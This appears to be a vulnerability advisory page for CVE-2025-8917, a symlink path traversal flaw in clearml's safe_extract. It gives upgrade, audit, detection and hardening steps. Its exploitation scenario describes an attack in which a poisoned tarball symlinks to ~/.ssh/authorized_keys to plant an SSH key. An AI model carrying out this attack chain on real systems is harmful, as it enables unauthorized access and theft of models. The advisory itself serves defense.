CVE-2025-8917: clearml: path traversal in safe_extract → RCE risk
GHSA-579p-qf78-fqm2 MEDIUM PoC AVAILABLE CISA: ATTENDUpgrade clearml to 2.0.2 immediately — the `safe_extract` path traversal allows crafted artifacts (models, datasets) to overwrite arbitrary files on extraction, achieving RCE on any host that processes them. The real threat vector is not a direct attacker but a poisoned artifact in your shared experiment store triggering file writes during automated pipeline execution. EPSS is negligible and no active exploitation observed, but MLOps pipelines that auto-extract artifacts from external or shared sources should treat this as higher priority than the score indicates.
Risk Assessment
CVSS 5.8 understates real-world risk in collaborative MLOps environments. The local attack vector assumes single-machine exploitation, but clearml instances routinely auto-extract artifacts from shared repositories, effectively broadening the attack surface to anyone who can push artifacts to your clearml server. Post-exploitation Confidentiality and Integrity impact is High — filesystem overwrites can yield persistent access. Low EPSS (0.00027) and no KEV listing confirm no active exploitation, but the symlink/hardlink → path traversal → RCE chain is well-understood and reproducible by moderately skilled attackers.
Affected Systems
| Package | Ecosystem | Vulnerable Range | Patched |
|---|---|---|---|
| clearml | pip | < 2.0.2 | 2.0.2 |
Do you use clearml? You're affected.
Severity & Risk
Attack Surface
Recommended Action
6 steps-
Patch: Run
pip install --upgrade clearmlto reach 2.0.2 across all environments (dev, CI/CD, training servers, inference hosts). -
Audit: Run
pip show clearmlto confirm version; flag any < 2.0.2 as critical. -
Artifact inspection: Review recently extracted archives for unexpected symlinks or files written outside extraction directories.
-
Detection: Alert on unusual file writes by clearml worker processes — especially targeting /etc/, ~/.ssh/, Python site-packages, or cron directories.
-
Hardening: Run clearml workers in containers with read-only host filesystem mounts and least-privilege service accounts.
-
Provenance controls: Enforce that workers only extract artifacts from authenticated, internal clearml servers — block external artifact sources at the network layer.
CISA SSVC Assessment
Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.
Classification
Compliance Impact
This CVE is relevant to:
Frequently Asked Questions
What is CVE-2025-8917?
Upgrade clearml to 2.0.2 immediately — the `safe_extract` path traversal allows crafted artifacts (models, datasets) to overwrite arbitrary files on extraction, achieving RCE on any host that processes them. The real threat vector is not a direct attacker but a poisoned artifact in your shared experiment store triggering file writes during automated pipeline execution. EPSS is negligible and no active exploitation observed, but MLOps pipelines that auto-extract artifacts from external or shared sources should treat this as higher priority than the score indicates.
Is CVE-2025-8917 actively exploited?
Proof-of-concept exploit code is publicly available for CVE-2025-8917, increasing the risk of exploitation.
How to fix CVE-2025-8917?
1. Patch: Run `pip install --upgrade clearml` to reach 2.0.2 across all environments (dev, CI/CD, training servers, inference hosts). 2. Audit: Run `pip show clearml` to confirm version; flag any < 2.0.2 as critical. 3. Artifact inspection: Review recently extracted archives for unexpected symlinks or files written outside extraction directories. 4. Detection: Alert on unusual file writes by clearml worker processes — especially targeting /etc/, ~/.ssh/, Python site-packages, or cron directories. 5. Hardening: Run clearml workers in containers with read-only host filesystem mounts and least-privilege service accounts. 6. Provenance controls: Enforce that workers only extract artifacts from authenticated, internal clearml servers — block external artifact sources at the network layer.
What systems are affected by CVE-2025-8917?
This vulnerability affects the following AI/ML architecture patterns: training pipelines, ml ops tooling, model registry, experiment tracking.
What is the CVSS score for CVE-2025-8917?
CVE-2025-8917 has a CVSS v3.1 base score of 5.8 (MEDIUM). The EPSS exploitation probability is 0.03%.
Technical Details
NVD Description
A vulnerability in clearml versions before 2.0.2 allows for path traversal due to improper handling of symbolic and hard links in the `safe_extract` function. This flaw can lead to arbitrary file writes outside the intended directory, potentially resulting in remote code execution if critical files are overwritten.
Exploitation Scenario
Adversary targets a data science team using shared clearml experiment tracking. They compromise a clearml artifact store (or publish a poisoned pre-trained model to a public registry the team imports). The malicious artifact is a tarball embedding a symlink: `./model.pt → /home/mlworker/.ssh/authorized_keys`. When a clearml worker automatically downloads and extracts this artifact during a scheduled training run, `safe_extract` follows the symlink — writing an adversary-controlled SSH public key to the host. Adversary gains persistent SSH access to the training server and from there can pivot to the broader ML infrastructure, exfiltrate proprietary models, or inject poisoned weights into downstream pipelines.
Weaknesses (CWE)
CVSS Vector
CVSS:3.0/AV:L/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:N References
Timeline
Related Vulnerabilities
CVE-2025-59528 10.0 Flowise: Unauthenticated RCE via MCP config injection
Same attack type: Supply Chain CVE-2024-2912 10.0 BentoML: RCE via insecure deserialization (CVSS 10)
Same attack type: Supply Chain CVE-2023-3765 10.0 MLflow: path traversal allows arbitrary file read
Same attack type: Supply Chain CVE-2025-5120 10.0 smolagents: sandbox escape enables unauthenticated RCE
Same attack type: Supply Chain CVE-2026-21858 10.0 n8n: Input Validation flaw enables exploitation
Same attack type: Code Execution
AI Threat Alert